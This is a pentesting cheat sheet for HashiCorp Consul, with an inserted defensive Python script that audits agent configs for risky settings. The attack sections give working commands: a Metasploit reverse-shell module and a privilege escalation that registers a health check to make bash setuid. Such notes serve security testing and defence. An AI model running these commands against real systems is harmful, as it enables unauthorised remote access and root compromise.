HashiCorp Consul Pentesting
Last modified: 2025-03-15
An open-source service networking platform developed by HashiCorp. The default port is 8500.
Interesting Files in Target System
If we are in the target system, we can investigate the following files:
cat /etc/consul.d/config.json
RCE
Resource: Pentester Academy Blog
Using Metasploit, we may be able to execute commands and get a reverse shell. Run the following commands on your local machine.
msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target system
Privilege Escalation
If you have an ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to escalate privileges.
First, create a script which changes the permissions of ‘bash’.
echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh
Then register a service with curl; its health check runs the script.
curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/exploit.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
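Both techniques above depend on the agent accepting script checks registered through its HTTP API. The following is an added example, not part of the original page or of Consul itself: a defender-side audit of the parsed agent configuration for the settings that allow this. It assumes a JSON config using the current nested "acl" block; the function name and both sample configurations are constructed for illustration.

```python
import json

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_consul_config(cfg):
    """Return findings for agent settings that allow check-based command execution."""
    findings = []
    acl = cfg.get("acl") or {}
    # Script checks registered over the HTTP API run their "Args" as the agent's user.
    if cfg.get("enable_script_checks"):
        findings.append("enable_script_checks is true: use enable_local_script_checks instead")
    # With ACLs off, /v1/agent/service/register accepts requests without a token.
    if not acl.get("enabled"):
        findings.append("acl.enabled is not true: the HTTP API is unauthenticated")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("acl.default_policy is not deny: requests without a matching rule are allowed")
    # client_addr defaults to 127.0.0.1; anything else exposes port 8500 off-host.
    exposed = [a for a in str(cfg.get("client_addr", "127.0.0.1")).split() if a not in LOOPBACK]
    if exposed:
        findings.append("client_addr exposes the API on: " + ", ".join(exposed))
    # Tokens in the config file are readable by anyone who can read that file.
    if acl.get("tokens"):
        findings.append("acl.tokens is set: restrict the file to the consul user")
    return findings

# Constructed sample configurations (not taken from any real system).
WEAK = json.loads("""{
  "client_addr": "0.0.0.0",
  "enable_script_checks": true,
  "acl": {"enabled": true, "default_policy": "allow",
          "tokens": {"agent": "00000000-0000-0000-0000-000000000000"}}
}""")
HARDENED = json.loads("""{
  "client_addr": "127.0.0.1",
  "enable_local_script_checks": true,
  "acl": {"enabled": true, "default_policy": "deny"}
}""")

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_consul_config(cfg) or "no findings")
```

To audit a real agent, load /etc/consul.d/config.json with json.load and pass the result to audit_consul_config.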
KV (Key/Value) Store
# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data